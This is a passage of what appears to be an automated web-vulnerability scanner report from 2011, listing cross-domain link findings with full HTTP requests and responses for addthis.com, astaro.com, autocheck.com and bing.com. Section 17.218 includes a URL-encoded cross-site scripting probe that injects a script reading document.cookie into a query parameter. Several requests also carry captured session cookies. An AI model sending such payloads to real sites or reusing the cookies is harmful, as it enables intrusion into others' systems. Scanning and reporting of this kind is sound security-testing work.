17.217. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.addthis.com/bookmark.php?v=250&username=mcilus

The response contains the following links to other domains:

http://cache.addthiscdn.com/www/q0205/js/bookmark.js
http://cache.addthiscdn.com/www/q0205/style/bookmark.css

Request

GET /bookmark.php?v=250&username=mcilus HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<link rel="canonical" href="http://www.addthis.com/bookmark.php" />
<link href="//cache.addthiscdn.com/www/q0205/style/bookmark.css" rel="stylesheet" type="text/css" />
<style type="text/css" media="only screen and (device-width: 768px)" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0205/js/bookmark.js"></script>
...[SNIP]...

17.218. http://www.astaro.com/newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/newsletter

Issue detail

The page was loaded from a URL containing a query string:

http://www.astaro.com/newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1

The response contains the following links to other domains:

http://cf.kampyle.com/k_button.css
http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js
http://w.sharethis.com/chicklets/email.gif
http://w.sharethis.com/chicklets/facebook.gif
http://w.sharethis.com/chicklets/sharethis.gif
http://w.sharethis.com/chicklets/twitter.gif
http://www.kampyle.com/?r=3

Request

GET /newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1 HTTP/1.1
Host: www.astaro.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __unam=fa38af9-12dddaf19a7-13ff2714-1; k_visit=1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=112476180.1215039085.1296493738.1296493738.1296504424.2; __utma=1.546991621.1296493738.1296493738.1296493738.1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:54:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 13:54:53 GMT
X-Varnish: 1753529221
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 59023

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>

   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...

   <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" />

...[SNIP]...
<a id="ck_email" class="stbar chicklet" href="javascript:void(0);"><img src="http://w.sharethis.com/chicklets/email.gif" /></a>
<a id="ck_facebook" class="stbar chicklet" href="javascript:void(0);"><img src="http://w.sharethis.com/chicklets/facebook.gif" /></a>
<a id="ck_twitter" class="stbar chicklet" href="javascript:void(0);"><img src="http://w.sharethis.com/chicklets/twitter.gif" /></a>
<a style="" id="ck_sharethis" class="stbar chicklet" href="javascript:void(0);"><img src="http://w.sharethis.com/chicklets/sharethis.gif" />ShareThis</a>
...[SNIP]...
<div>
   <a href="http://www.kampyle.com/?r=3" target="kampyleWindow" id="kampylink" class="k_float k_top_sl k_right"
    onclick="javascript:k_button.open_ff('site_code=4404685&form_id=48801&lang=en');return false;">
    <img src="/sites/all/themes/yaml/layouts/yaml_astaro/images/en-orange-corner-up-right.png" alt="Feedback Form" border="0"/>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

17.219. http://www.astaro.com/sites/all/modules/images/lightbox2/js/lightbox_video.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/sites/all/modules/images/lightbox2/js/lightbox_video.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.astaro.com/sites/all/modules/images/lightbox2/js/lightbox_video.js?G

The response contains the following link to another domain:

http://www.apple.com/qtactivex/qtplugin.cab

Request

GET /sites/all/modules/images/lightbox2/js/lightbox_video.js?G HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 10:27:35 GMT
ETag: "20c87-1e80-1a2f93c0"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 7808
Date: Tue, 01 Feb 2011 14:10:51 GMT
X-Varnish: 1753541046 1753513849
Age: 2234
Via: 1.1 varnish
Connection: close

/* $Id: lightbox_video.js,v 1.1.1.1 2010/01/12 10:27:35 mkindtner Exp $ */

/**
* Lightbox video
* @author
* Stella Power, <http://drupal.org/user/66894>
*/

var Lightvideo = {

// startVideo(
...[SNIP]...
n (href) {
if (Lightvideo.checkKnownVideos(href)) {
return;
}
else if (href.match(/\.mov/i)) {
if (navigator.plugins && navigator.plugins.length) {
Lightbox.modalHTML ='<object id="qtboxMovie" type="video/quicktime" codebase="http://www.apple.com/qtactivex/qtplugin.cab" data="'+href+'" width="'+Lightbox.modalWidth+'" height="'+Lightbox.modalHeight+'"><param name="allowFullScreen" value="true">
...[SNIP]...
</object>';
} else {
Lightbox.modalHTML = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" width="'+Lightbox.modalWidth+'" height="'+Lightbox.modalHeight+'" id="qtboxMovie"><param name="allowFullScreen" value="true">
...[SNIP]...

17.220. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.autocheck.com/?WT.mc_id=3499&siteID=3499

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?
http://www.autocheckmembers.com/
http://www.experian.com/corporate/about-experian.html
http://www.experian.com/corporate/legalterms.html
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&guid=ON&script=0
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=3499&siteID=3499 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:05 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.709129666138539; path=/; expires=Fri, 04-Mar-11 15:43:05 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=d1zevGA8SakdljQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:09 GMT
Set-Cookie: JSESSIONID=d1zevGA8SakdljQcN3; path=/
Connection: close
Content-Type: text/html
Content-Length: 30106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...
<link rel="stylesheet" href="/consumers/stylesheets/autocheck.css" type="text/css" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css" />


...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&guid=ON&script=0"/>
</div>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/about-experian.html">About
                       Experian</a>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/legalterms.html">Site Terms &
                       Conditions</a>
...[SNIP]...
<li>
                   <a href="http://www.autocheckmembers.com">Visit Our
                       Dealer Site</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js"></script>
...[SNIP]...

17.221. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/?FORM=MSNH14

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx
http://www.msn.com/
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=MSNH14&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU

Request

GET /?FORM=MSNH14 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28726
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:14 GMT
Connection: close
Set-Cookie: _SS=SID=38C4E58CA29441DEB8EAF6CE1C02C9E9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:14 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1664fbf704b94e048aa574bb2e2d59e6; expires=Fri, 01-Feb-2013 15:43:14 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:14 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=SERP,70.1')">MSN</a> | </li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=SERP,72.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=SERP,82.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=SERP,84.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=SERP,86.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=SERP,88.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=SERP,90.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=SERP,92.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=MSNH14&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=SERP,94.1')">Tell us what you think</a>
...[SNIP]...

17.222. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/images/results.aspx?q=

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://feedback.live.com/default.aspx?productkey=wlsearchimage&backurl=/images/search.aspx?q=
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808550.aspx
http://www.msn.com/

Request

GET /images/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62681
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:15 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Fri, 01-Feb-2013 15:43:15 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=1BDEDE82282A4A3B82B9E6A50AAF541C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c186a488d1c054615bcdf373d2fc5bc05; expires=Fri, 01-Feb-2013 15:43:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:15 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,64.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,66.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,77.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,79.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,81.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,83.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,85.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808550.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,87.1')">Help</a> | </li><li><a href="http://feedback.live.com/default.aspx?productkey=wlsearchimage&backurl=/images/search.aspx?q=" id="sb_feedback" onmousedown="return si_T('&ID=FD,89.1')">Tell us what you think</a>
...[SNIP]...

17.223. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/?q=

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.msn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661412&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%253fq%253d&lc=1033&id=264960

Request

GET /maps/?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 3b62a94fc5b4485d909516c1e2b3eef0
X-Ve-Server: BL2-01207-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001207
Date: Wed, 02 Feb 2011 15:43:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=23209A4105014A6282298E26484BB449; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:32 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cdd81639d99664f2bb1a4f20eb40afe35; expires=Fri, 01-Feb-2013 15:43:32 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:32 GMT; domain=.bing.com; path=/
Content-Length: 117409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661412&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%253fq%253d&lc=1033&id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,49.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,57.1')">About our ads</a>
...[SNIP]...

17.224. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/default.aspx?FORM=MSNNAV

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.msn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661414&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fdefault.aspx%253fFORM%253dMSNNAV&lc=1033&id=264960

Request

GET /maps/default.aspx?FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 13ff6b3a4c8b481c85cc01ff5d39b7bd
X-Ve-Server: BL2-01212-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Wed, 02 Feb 2011 15:43:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=96EBC031A9904F86A25FEEA07F634C4F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf4eca0e6f5fd4b64b7594026f69603a4; expires=Fri, 01-Feb-2013 15:43:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:34 GMT; domain=.bing.com; path=/
Content-Length: 117566

